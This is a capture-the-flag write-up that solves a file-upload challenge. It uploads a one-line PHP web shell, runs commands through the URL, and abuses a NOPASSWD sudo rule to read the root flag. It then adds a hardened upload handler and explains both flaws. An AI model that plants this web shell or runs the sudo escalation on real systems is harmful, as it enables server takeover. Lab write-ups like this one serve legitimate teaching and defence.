n0s4n1ty 1

CHALLENGE DESCRIPTION

SOLUTION

Upload our payload:

<?php system($_GET["cmd"]); ?>

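We can see that our file is located at /uploads/[file].

Now we pass a command through the URL: /uploads/[file].php?cmd=sudo -l

The response shows NOPASSWD: ALL, which means the account running the web application can run any command through sudo without a password.

From here it is easy: run sudo cat /root/flag.txt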
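
The upload above succeeded because the server kept the client-supplied .php name in a directory where PHP is executed. As an added example (not code from the challenge or its authors), here is an upload handler that closes that path; the form field name "file", the storage directory and the allowed image types are assumptions.

```php
<?php
declare(strict_types=1);
// Added example: hardened upload handler. The field name "file", the storage
// path and the allowed types are assumptions, not taken from the challenge.

const UPLOAD_DIR = '/var/app-data/uploads';   // assumed path, outside the web root
const MAX_BYTES  = 2 * 1024 * 1024;
const ALLOWED    = [                          // detected MIME type => extension we assign
    'image/png'  => 'png',
    'image/jpeg' => 'jpg',
    'image/gif'  => 'gif',
];

function store_upload(array $file): string
{
    // Missing field, multi-file arrays and PHP upload errors all stop here.
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        throw new RuntimeException('upload failed');
    }
    if (!is_uploaded_file($file['tmp_name']) || $file['size'] > MAX_BYTES) {
        throw new RuntimeException('rejected: not an upload or too large');
    }

    // Decide the type from the file's bytes, never from the client-supplied
    // name or Content-Type header.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if ($mime === false || !isset(ALLOWED[$mime])) {
        throw new RuntimeException('rejected: type not allowed');
    }

    // Server-chosen name and extension: the original name (e.g. shell.php)
    // never reaches the filesystem.
    $name = bin2hex(random_bytes(16)) . '.' . ALLOWED[$mime];
    $dest = UPLOAD_DIR . '/' . $name;
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        throw new RuntimeException('could not store file');
    }
    chmod($dest, 0640);
    return $name;
}

try {
    $stored = store_upload($_FILES['file'] ?? []);
    echo 'stored as ' . htmlspecialchars($stored, ENT_QUOTES);
} catch (RuntimeException $e) {
    http_response_code(400);
    echo 'upload rejected';
}
```

A file can carry valid image bytes and still contain PHP, so the byte check alone is not the control: the server-assigned extension and the storage location outside the web root are what keep the upload from being executed. The NOPASSWD: ALL sudo rule is a separate misconfiguration that turned code execution as the web account into root access.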